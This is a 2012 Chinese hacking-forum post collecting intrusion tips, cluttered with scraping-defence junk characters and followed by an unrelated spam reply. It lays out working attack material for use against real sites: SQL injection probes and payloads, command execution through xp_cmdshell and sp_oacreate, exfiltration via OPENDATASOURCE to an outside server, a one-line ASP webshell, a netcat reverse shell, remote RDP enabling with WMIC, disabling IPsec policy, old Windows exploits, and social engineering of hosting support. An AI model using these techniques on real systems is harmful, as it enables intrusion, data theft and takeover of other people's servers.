找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3431|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
SA点数据库分离技术相关
! _( S# Z& B: J% l2 l6 Z
' ]7 l6 ]1 W; O& D8 J% R  v  w1 ^1 {- r. {& i
SA点数据库分离搞法+语句:: V( E  d# J8 C' e! O9 s

' G  t* m( p9 `, Q+ r注射点不显错,执行下面三条语句页面都返回正常。6 t+ F) j5 k/ {. M
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
# e1 z0 o! s/ |6 o9 a: J0 nand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
& f. k* a  T8 z$ |, I; _and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
: M0 X0 q% v+ s* K. K0 v7 H可以列目录,判断系统为2000,web与数据库分离/ D  N0 W0 }- `) M
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。# l# |: `$ \5 f& g9 ~1 ?% \$ P
在注射点上执行
& @: ^3 K0 u6 D) p+ Ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--  u7 t/ J. B# }  s
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP' F" q% ?* A6 k7 r7 X4 z
还有我用NC监听得其他端口都没有得到IP。5 _/ p7 r7 f2 k% a
+ u7 [) j6 z+ V4 S
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
, z1 t! t$ w; a4 O+ v'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--8 |) u" z1 Y: r+ H
6 N# i! b! j' u6 [) O
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--0 v# ?2 A' A+ h8 O7 a& a
/ S2 t( S/ C: j7 `* Y
现在就猜想是不是数据库是内网而且不能连外网。
( C. c, ?9 v1 S9 E- G& Q: q% q& q2 ^$ A* [) a3 k

" S# t: d1 @  q# laccess导出txt文本代码
, T8 }! V2 U" S  d; [4 W9 ISELECT * into [test.txt] in 'd:\web\' 'text;' from admin9 {* }/ Y; \% P9 Y1 [0 a. I" E

* y% r3 L  j, E% w, e/ z6 h% ~; V* D' c$ T' A- _; M$ g
% u, V( O3 g' @+ K
自动跳转到指定网站代码头
0 u' k  a- M1 B# C- ^8 l<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>+ w0 F; A, }! `9 t2 k2 `, d

. ~; \) `- [5 x/ D
# G- g9 X, N+ M% u入侵java or jsp站点时默认配置文件路径:
1 z, G& F  p) w4 V\web-inf\web.xml9 A# k. B: z, E0 e3 ^8 Q! ^8 p
tomcat下的配置文件位置:9 N6 J: P  ^4 @* k' a5 c) }
\conf\server.xml            (前面加上tomcat路径)
3 k- ]# }+ n. n8 a/ `\Tomcat 5.0\webapps\root\web-inf\struts-config.xml: ?: {$ [. D3 d! x
9 c( {2 M4 r( M  s# @; v) @  O

4 N/ P' T+ n- I& [) r6 f' V' V3 q. ]/ j* X
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
. b7 @7 F1 _- w. T/ V-1%23( z5 R6 x2 }$ f( h- `
> ; E& F2 f2 x: Q3 }/ W4 r# ^8 H
<# y' T; r# N- M: ?/ O0 b5 e% R( O
1'+or+'1'='1) C9 X% g3 k& v9 z3 h( M
id=8%bf6 [1 j  b, N2 Q0 Y, D

$ {. A1 R5 k( O8 ]4 ]: s全新注入点检测试法:7 q: N9 I7 |+ V) b; U  A! |. I
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
' t& [5 Z# X' e6 F8 O& F( G
6 b; {  L, f* O在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
% \5 l, J8 n, K" u2 a) \" h" d  E- ]1 E9 t" `8 M9 P9 d$ n+ f# B) n
搜索型注入判断方法:5 `" Q4 _0 g0 y2 l
北京%' and '1'='1' and '%'='4 F. X6 ~& I! J. ^0 M, `7 }# U3 I$ U  c8 b
北京%' and '1'='2' and '%'='  P3 _6 g3 N; n6 B8 w) Z

; b: A5 J) x! R7 Y' F2 ~( P" l+ L1 I/ Y9 _& ~" ?1 K: S
COOKIES注入:; N/ R; ?8 u4 [  B# B& F/ J
. k* l5 d3 q$ _  {- E
javascript:alert(document.cookie="id="+escape("51 and 1=1"));  L& {6 o( ~& `! F  t! H0 P- V1 E/ o

# R2 w" I" l( [6 c2000专业版查看本地登录用户命令:4 G1 u) [& c+ x- k
net config workstation+ K+ `5 G9 y& G" e' P8 D3 J% s
0 U" H. N' O) H9 h; f9 Z0 G
+ o7 a3 V6 f7 t9 _3 O; j
2003下查看ipsec配置和默认防火墙配置命令:
8 \0 }+ Q; S6 e9 x0 [7 ?5 Z) Lnetsh firewall show config
' p9 _- B5 s/ I) jnetsh ipsec static show all4 S% E  e; L: z

) z" j. j, g/ V6 R不指派指定策略命令:: S/ S4 C. h( b7 ^
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
* G$ _+ Y& f$ T" G8 }, L# Pnetsh ipsec static show policy all  显示策略名; a% w$ a4 R" h' z" B# k# G' J

2 L2 v* F% g3 D+ k- V
' C: C/ A/ M0 W+ c: w  s猜管理员后台小技巧:
+ L5 B' [( P: \6 O; z! }! K3 nadmin/left.asp
& S1 n1 U5 s1 Xadmin/main.asp5 G3 L' S- |. f( d' Z
admin/top.asp
# D5 e. }; X0 W2 g7 I9 ^admin/admin.asp / d/ t* H; Y. }- K
会现出菜单导航,然后迅雷下载全部链接; D5 |1 W* V9 y7 P6 r

$ \( d  [$ ~- z- a! p
9 j2 I( ~- @0 l! S社会工程学:: d% [+ N- _: j: Z5 i$ \2 l: @5 p9 R
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人% F7 k7 b+ t- S" Q) Z
然后去骗客服" e- X, S8 M) W# Y& k

- r3 k2 T0 G$ _9 h. Q7 v# f1 q0 g; L) ?" O! \0 H
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
' k! v7 |0 _0 C0 ?查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
4 j! P2 ]/ m5 Z6 |  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。* ^. z7 D4 r; U! S2 b

. _7 R: V8 Z5 |' l) D4 r) f; A8 y: D6 s% q6 r2 X1 Q( y3 {

5 j' T5 D8 M0 z5 y6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)! Z: P6 r- ~$ t, L/ `

. |' L& T8 X5 U. B7 V( T1 D9 t0 U) `* d* u. n

; `* [7 I- s4 O! v2 N; N2 ECMD加密注册表位置
* A) \9 P( h% S(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor- D. h# p$ d8 s+ `( }# s
AutoRun
/ D. h) g) D) t9 [1 A
: r  ^0 P6 G8 I- X6 E% @, h(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor4 C' p# R+ |% z  F. w' b
AutoRun
- @- f0 r& B( }, r: P, c# W" N! I: h" f0 J5 _
$ a  Z4 W' d, T, Y
在找注入时搜索Hidden,把他改成test
: b* a9 y4 `/ K; L+ ~3 i/ X3 O# ^% l

7 s/ G! ^4 @& X; _& u
' h% u; V5 T" I; [mstsc /v:IP /console : k3 ~3 u- q+ ?/ X$ _" J

! c  t$ B$ Q, [! b, {$ U* i
& c3 k) p: c) w& D  K  r一句话开3389:7 T- \% W. `; T  W# h: \

: ~- I; }' T0 G- e最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
3 u/ _" |( }, {; x6 [% L1 j$ T开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.) T- }& z: y& t0 c* @9 B0 k

! |3 E0 z. f  V  [' I5 \7 ^
8 U; Q! {7 \% L& T1 K% \+ |0 z, }知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:" ?4 x- r+ Z  R: T* e9 c
Insert into admin(user,pwd) values('test','test')
$ K- B$ E  W2 P" V- E# R
* E; T0 \3 @+ O8 S# b
4 y& u- ?4 r9 |1 rNC反弹
6 \8 B& N. I, U5 E先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
% Q9 R. R  _3 H& E然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)! w2 C) p- w" T5 O: W5 V" J6 d) u" P# k& o

+ J6 R2 [" X2 v" o7 o, J$ Q+ j2 F6 I* W7 g" d
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题" |3 N# x% z6 N4 S. m9 J- [8 y

& B9 O8 o$ b- ~有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录. N: B) C0 |; T9 j+ |7 B
例如:
! j/ x& g. @+ V& u9 E1 v- jsubst k: d:\www\ 用d盘www目录替代k盘: Z9 q0 `% S3 s+ B% a. }
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表